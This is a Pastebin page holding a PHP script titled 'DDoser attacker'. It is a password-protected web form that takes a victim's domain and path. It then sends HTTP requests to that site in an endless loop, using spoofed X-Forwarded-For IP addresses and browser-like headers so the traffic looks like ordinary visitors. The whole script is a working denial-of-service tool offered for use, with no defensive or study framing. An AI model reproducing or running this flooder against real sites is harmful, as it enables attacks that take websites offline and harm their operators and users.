Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- /* -- By Punker2Bot -- */
- $dominio = $_POST['host'];
- $ruta = $_POST['path'];
- $port = $_POST['port'];
- $poder = $_POST['poder'];
- $pw = $_POST['pw'];?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <meta name="msvalidate.01" content="ECAB4AE09BDECAEDA633439FD8D12D38" />
- <meta name="author" content="Punker2Bot" />
- <title>DDoser attacker Thuthuat247.com</title>
- <style>
- body { padding: 3px; }
- * {
- background-color: #1F1F1F;
- color: #0EEF57;
- font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
- font-size: 18px;
- margin: 0; }
- input {
- width: 440px;
- border: solid 1px #00BCFF;
- padding: 2px; }
- input.accion {
- width: 215px;
- border: solid 2px #00BCFF;
- padding: 3px;
- cursor: pointer }
- input:hover , input:active { border-color: #FFE900 }
- #dinamico {
- padding: 3px;
- font-size: 13px!important;
- height: 300px;
- min-height: 300px;
- max-height: 300px;
- overflow: hidden }
- </style>
- **********
- function ir_a_bajo() {
- var scc = document.getElementById('dinamico');
- scc.scrollTop = scc.scrollHeight + scc.offsetHeight;
- }
- setInterval('ir_a_bajo()',75);
- </script>
- </head>
- <body id="index">
- <form action="" method="post" name="jaja">
- <table>
- <tr>
- <td class="titulo">
- Dominio</td> <td><input id="boton" type="text" name="host" value="<?php if($dominio=="") { print 'www.victima.com'; } else { print htmlentities($dominio); } ?>" size="40px" ></td>
- </tr>
- <tr>
- <td class="titulo">
- Path </td> <td> <input id="boton" type="text" name="path" value="<?php if($ruta=="") { print '/index.php'; } else { print htmlentities($ruta); } ?>" size="40px" /> </td>
- </tr>
- <tr>
- <td class="titulo">
- Puerto </td>
- <td><input id="boton" type="text" disabled name="port" value="<?php if($port=="") { print '80 (disabled)'; } else { print htmlentities($port); } ?>" size="40px" /> </td>
- </tr>
- <tr>
- <td class="titulo">
- Code </td>
- <td><input id="boton" type="text" name="pw" value="<?php if($pw=="") { print 'Password'; } else { print htmlentities($pw); } ?>" size="40px" /> </td>
- </tr>
- <tr>
- <td class="titulo">
- Preparado? </td> <td>
- <input type="submit" value="DDosear now!" class="accion"> <input type="button" value="Dejar de atacar!" class="accion" /> </td>
- </tr>
- </table>
- </form>
- <br />
- <div id="dinamico">
- <?php
- @set_time_limit(0);
- $msj = array("<h2>No podes continuar, pw erroneo</h2></div></body></html>","<h2>Completa el form con los datos de la vicima!</h2></div></body></html>","<big><b>Error al atacar</b></big><br />\n","0a32e26a417d2c7cfbd333b7feb0a0a8","2e2234a41122a233cfbd333b9bc30a03");
- function ddoser($dominio,$ruta) {
- //hago un random de ips para no ser siempre el mismo vistitante
- $ip_simulada = rand(188,254).'.'.rand(1,254).'.'.rand(1,254).'.'.rand(1,254);
- //defino y abro socket segun los datos del form
- $socket = fsockopen($dominio, "80", $errno, $errstr, 30);
- // comienzan los datos del header para parecer una persona comun xD
- $header = "GET ".$ruta." HTTP/1.1\r\n";
- $header .= "Host: ".$dominio."\r\n";
- $header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\r\n";
- $header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5\r\n";
- $header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
- $header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
- $header .= "Keep-Alive: 300\r\n";
- $header .= "*****-Connection: keep-alive\r\n";
- $header .= "Referer: http://".$dominio.$ruta."\r\n";
- $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $header .= "X-Forwarded-For: ".$ip_simulada."\r\n";
- $header .= "Via: CB-Prx\r\n";
- $header .= "Connection: Close\r\n\r\n";
- //envio todo lo recolectado
- $send_header = fwrite($socket,$header);
- //lo muestro en la web
- if($send_header) {
- print("Attacking as: <span style='color:#FF0F2F'>".$ip_simulada."</span> @ ".htmlentities(str_replace('www.','',$dominio))."".htmlentities($ruta)."<br />\n");
- } else {
- print("$msj[2]");
- }
- fclose($socket);
- }
- if($msj[3] !== (md5(md5($pw)))) { die ("$msj[0]");}
- if($dominio !== "" && $dominio !== "www.victima.com") {
- while(1) {
- ddoser($dominio,$ruta);
- }
- } else { die ("$msj[1]");}
- ?>
- </div>
- </body>
- </html><? $el_saludo_es = "Chau gay, disfruta el script ;)" ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement